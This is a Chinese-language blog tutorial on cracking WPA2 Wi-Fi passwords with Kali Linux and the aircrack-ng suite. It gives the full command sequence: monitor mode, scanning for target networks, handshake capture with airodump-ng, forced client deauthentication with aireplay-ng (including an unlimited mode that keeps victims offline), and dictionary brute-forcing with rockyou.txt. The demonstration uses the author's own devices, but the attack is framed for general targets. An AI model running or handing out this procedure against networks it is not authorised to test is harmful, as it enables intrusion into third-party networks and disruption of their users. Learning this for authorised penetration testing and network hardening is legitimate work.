无线网渗透之Kali破解wifi密码

发布时间 2023-06-28 11:50:49作者: charonlight

kali破解wifi密码(WiFi渗透)

一、前期准备工作

1、将无线网卡挂载到Kali上

​ 将无线网卡插到电脑上,如果弹出检测到新的USB设备,就将此设备连接到虚拟机。然后点击虚拟机--->可移动设备--->选择自己的网卡--->连接

image-20220513162708667

可能出现的问题:在可移动设备处无法连接无线网卡;解决:在虚拟机设置中将usb控制器设置成如图所示。注意要先关闭虚拟机在设置。

image-20220513144527731

2、查看是否挂载成功

​ 使用ifconfig命令查看是否存在wlan0网卡,如果不现在可能是未挂载成功或者wlan0网卡不是激活状态

# 显示up状态(激活状态)的网卡信息
ifconfig
# 显示所有网卡的信息,包含未up的
ifconfig -a
# 激活wlan0
sudo ifconfig wlan0 10.0.0.100 up

image-20220513143707563

3、查看网卡是否支持监听模式

# 使用su切换root,后面操作基本都需要root权限
su
# 使用airmon-ng查看,如果PYH一栏为null,表示不支持监听模式
airmon-ng

# 如果不支持监听模式请更换无线网卡,或者使用监听驱动 
# 参考 https://www.cnblogs.com/answerThe/p/12488477.html ,https://github.com/aircrack-ng?tab=repositories

image-20220513144120181

4、检查文件监听影响并杀死影响

# 检查影响
airmon-ng check
# 杀死影响
airmon-ng check kill 

image-20220513144853796

二、网卡监听抓包操作

5、开启无线网卡监听模式

# 开启无线监听,wlan0网卡就是刚刚上面使用ifconfig看到的网卡,开启监听模式后,无线网卡接口wlan0变动为wlan0mon, 能够输入ifconfig进行查看
airmon-ng start wlan0

image-20220513150442797

6、监听周边的WIFI

# 查看周边wifi,注意此时的网卡是wlan0mon,记录需要攻击的目标的BSSID和CH
airodump-ng wlan0mon

image-20220513151758327

7、开始抓包监听

### 抓包命令,请注意此抓包的shell窗口不要关闭
# 注意此处的shell窗口如果关闭过,抓的包的存储名称会有变化,后面解包时要注意,进入wifitest目录查看.cap的包
# 命令格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0monbssid就是要抓取包的mac地址,信道频率 是CH,)

mkdir wifitest
airodump-ng --bssid A4:39:B3:15:B5:9E -c 3 -w ./wifitest/ wlan0mon

# BSSID: 无线 AP 的硬件地址
# PWR: 信号强度,值是负数,绝对值越小表示信号越强
# CH: 无线网络信道
# ENC: 加密方式,我们要破解的是 WPA2
# ESSID: 无线网络的名称
# BSSID: 无线 AP 的硬件地址
# STATION: 用户设备的硬件地址

image-20220513152916961

8、强制下线重连

实战中以信号最强的为例(PWD为信号强度,越小信号越强),这里我强制我的手机下线重连(mac地址为---> A4:4B:D5:AC:41:7C)

# 新建一个shell窗口进行攻击
aireplay-ng -0 10 -a A4:39:B3:15:B5:9E -c A4:4B:D5:AC:41:7C wlan0mon

# -0 冲突攻击模式,用于使客户端断开与路由器的连接
# 10 为攻击的次数,如果一直跑不出来可以把线程设置大一点。设置为0会无限攻击,导致客户端一直无法连接路由器,请谨慎使用
# -a 路由器mac地址  -c 客户端mac地址

9、成功抓包及原理讲述

握手包抓取原理:当客户端与路由器建立链接进行通信时,会发送包含hash算法加密的密码数据包,也就是握手包。通过软件捕获此数据包,就完成了抓包。如果在抓包期间没有客户端连接路由器的过程,那就不会有握手包的发送,也就无法抓取握手包了,只能期待有新客户端连接路由器,或者原有客户端掉线后重新连接。除了漫长的等待我们还有一种方法,使用aircrack-ng套件的另一个工具aireplay-ng,它可以强制用户掉线并自动连接路由器,这样就有机会抓到握手包了(如果线程设置大的话,就会导致用户一直连不上网)。在airodump-ng抓包过程中,只要有设备连接到路由器,在station栏中找到它们的mac地址,此时重新打开一个终端,输入命令强制用户掉线重连,直至抓包监听的shell窗口出现WPA handshake即表示抓包成功。

image-20220513154530794

三、字典爆破解密

10、结束监听

# 抓包完成后就可以结束监听了,抓的包存储在wifitest目录下,进目录查看是否只有一个.cap的包,如果有多个,可能就是前面抓包时关闭过shell窗口,导致抓取了多个包,需要确定带有密码的包是哪一个,或者都进行爆破

# 在抓包的shell窗口先ctrl+c,再输入下面命令结束监听
airmon-ng stop wlan0mon

image-20220513160051602

11、字典爆破解密

# 先将Kali自带的字典解压,这是1个一千四百多万的大字典,爆破完估计得几天
gzip -d /usr/share/wordlists/rockyou.txt.gz
# 解密  -W 字典路径
aircrack-ng -w /usr/share/wordlists/rockyou.txt ./wifitest/-01.cap

接下来就是漫长的等待,也有可能解密不成功,这就是字典的问题,字典越大,越容易成功,也可在网上下载其他字典

image-20220513160657004

image-20220513162154788

# 这里为了演示效果,就使用自己新建的一个字典解密,我的密码是wang12345,kali那个字典里没有。。。
aircrack-ng ./wifitest/-01.cap -b A4:39:B3:15:B5:9E -w ./pass.txt

image-20220513161647344